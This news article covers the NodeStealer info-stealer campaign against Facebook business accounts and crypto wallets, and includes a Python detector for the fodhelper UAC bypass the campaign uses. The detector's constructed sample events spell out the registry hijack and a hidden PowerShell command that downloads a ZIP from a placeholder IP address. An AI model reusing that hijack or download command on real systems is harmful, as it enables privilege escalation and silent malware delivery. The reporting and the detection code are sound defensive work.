
NodeStealer Targets Facebook Business Accounts and Crypto Wallets

Cybersecurity researchers have documented a new Python variant of the NodeStealer malware that can take full control of Facebook business accounts and drain cryptocurrency wallets.

Palo Alto Networks' Unit 42 identified the previously undocumented strain as part of a campaign that began in December 2022, although the researchers found no evidence that the campaign is still active.

First documented by Meta in May 2023, NodeStealer was described as a stealer built to harvest cookies and passwords from web browsers in order to compromise Facebook, Gmail, and Outlook accounts. The earlier samples were written in JavaScript; the newly identified variants are written in Python.

Unit 42 issued a warning about the risks posed by NodeStealer, highlighting its financial implications for Facebook business accounts and its knack for stealing browser credentials, which can subsequently be leveraged for further cyberattacks.

The nefarious attacks commence with deceptive messages on Facebook, enticing victims with the promise of free “professional” budget tracking templates in Microsoft Excel and Google Sheets. Unsuspecting users fall prey to the scheme and end up downloading a seemingly innocent ZIP archive file hosted on Google Drive.

The deceptive ZIP file conceals within it the malicious stealer executable, which not only seizes crucial information from Facebook business accounts but also facilitates the download of additional malware, such as BitRAT and XWorm, in the form of ZIP files.

The malware also disables Microsoft Defender Antivirus and steals cryptocurrency by using MetaMask credentials extracted from the Google Chrome, Cốc Cốc, and Brave web browsers.

The attackers use a User Account Control (UAC) bypass built on fodhelper.exe, an auto-elevating Windows binary that consults a registry key the current user can write to (HKCU\Software\Classes\ms-settings\shell\open\command). By planting a command there, the malware gets PowerShell to run with elevated privileges and no UAC prompt, fetching the ZIP files from a remote server without the user noticing.

It is worth noting that the fodhelper UAC bypass has previously been used by the financially motivated threat actors behind the Casbaneiro banking malware to obtain elevated privileges on compromised hosts.
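As an added, illustrative example (not Unit 42's analysis code and not NodeStealer itself), the following Python detector runs over a handful of constructed Sysmon-style events and flags the two observable steps of the fodhelper bypass described above: a value written under the ms-settings shell command key in a user hive, and fodhelper.exe spawning a child process. The dropper path, SID, the 192.0.2.10 address, the timestamps and the event field names follow Sysmon conventions but are all placeholders constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style events, not real telemetry. Sysmon EventID 13 is
# "RegistryEvent (Value Set)"; EventID 1 is "Process Create". Sysmon records the
# current user's hive as HKU\<SID>, so HKCU\Software\Classes\... appears as
# HKU\S-1-5-21-...\Software\Classes\... . Paths, SID and the 192.0.2.10 address
# are placeholders.
DROPPER = r"C:\Users\victim\Downloads\budget_template.exe"
HIVE = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings\Shell\Open\command"
PS_CMD = r"powershell.exe -w hidden -c iwr http://192.0.2.10/a.zip -OutFile a.zip"

SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2023-08-01 10:00:00.000", "Image": DROPPER,
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium",
     "CommandLine": DROPPER},
    # Step 1: the dropper plants the hijack. The empty DelegateExecute value
    # makes the shell run the (Default) command instead of the normal handler.
    {"EventID": 13, "UtcTime": "2023-08-01 10:00:05.000", "Image": DROPPER,
     "TargetObject": HIVE + r"\DelegateExecute", "Details": ""},
    {"EventID": 13, "UtcTime": "2023-08-01 10:00:05.100", "Image": DROPPER,
     "TargetObject": HIVE + r"\(Default)", "Details": PS_CMD},
    # Step 2: fodhelper.exe auto-elevates and spawns the planted command.
    {"EventID": 1, "UtcTime": "2023-08-01 10:00:06.000",
     "Image": r"C:\Windows\System32\fodhelper.exe", "ParentImage": DROPPER,
     "IntegrityLevel": "High", "CommandLine": "fodhelper.exe"},
    {"EventID": 1, "UtcTime": "2023-08-01 10:00:06.500",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "IntegrityLevel": "High", "CommandLine": PS_CMD},
    # Benign noise: a user opening Optional Features from Explorer; no child.
    {"EventID": 1, "UtcTime": "2023-08-01 11:30:00.000",
     "Image": r"C:\Windows\System32\fodhelper.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "High",
     "CommandLine": "fodhelper.exe"},
]

MS_SETTINGS_CMD = re.compile(r"\\Classes\\ms-settings\\Shell\\Open\\command",
                             re.IGNORECASE)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def detect_fodhelper_bypass(events, window=timedelta(minutes=5)):
    """Return findings for the two observable steps of the fodhelper bypass.

    Rule 1 flags any value written under ms-settings\\Shell\\Open\\command in a
    user hive. Rule 2 flags fodhelper.exe spawning a child process at all (it
    normally spawns nothing); severity rises if the child is a script
    interpreter, and to critical if a Rule 1 hit precedes it within `window`.
    """
    findings, hijacks = [], []
    for i, ev in enumerate(events):
        if ev["EventID"] == 13 and MS_SETTINGS_CMD.search(ev.get("TargetObject", "")):
            hijacks.append(_ts(ev["UtcTime"]))
            findings.append({"index": i, "rule": "ms-settings-command-hijack",
                             "severity": "medium", "image": ev["Image"],
                             "target": ev["TargetObject"],
                             "planted_command": ev.get("Details", "")})
        elif ev["EventID"] == 1 and _basename(ev.get("ParentImage", "")) == "fodhelper.exe":
            child = _basename(ev["Image"])
            t = _ts(ev["UtcTime"])
            correlated = any(timedelta(0) <= t - h <= window for h in hijacks)
            severity = "critical" if correlated else (
                "high" if child in INTERPRETERS else "medium")
            findings.append({"index": i, "rule": "fodhelper-child-process",
                             "severity": severity, "child": child,
                             "integrity": ev.get("IntegrityLevel", ""),
                             "command_line": ev.get("CommandLine", ""),
                             "preceded_by_hijack": correlated})
    return findings


if __name__ == "__main__":
    for finding in detect_fodhelper_bypass(SAMPLE_EVENTS):
        print(finding)
```

Run against the embedded events, the script reports three findings: the two registry writes at medium severity, and the PowerShell child of fodhelper.exe at critical because it follows the hijack within the window. The Explorer-launched fodhelper.exe, which spawns nothing, produces no finding. The same two rules map directly onto Sysmon Event ID 13 (TargetObject) and Event ID 1 (ParentImage) in real telemetry, and the registry rule alone is worth alerting on: there is no legitimate reason for a user-hive ms-settings command handler to exist.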

Unit 42 also discovered an upgraded Python variant of NodeStealer with anti-analysis capabilities, email parsing from Microsoft Outlook, and attempts to take over the victim's linked Facebook account.

Once all the necessary data is harvested, the files are stealthily exfiltrated via the Telegram API, following which they are systematically erased from the targeted machine to cover the tracks of the malicious operation.

NodeStealer joins malware such as Ducktail in a broader trend of Vietnamese threat actors targeting Facebook business accounts, both for advertising fraud and to spread malware to other unsuspecting users.

This development comes at a time when threat actors have also been observed abusing WebDAV servers to deliver BATLOADER and to distribute XWorm in phishing attacks.

Researchers strongly advise Facebook business account owners to fortify their security measures, including the adoption of robust passwords and enabling multi-factor authentication.
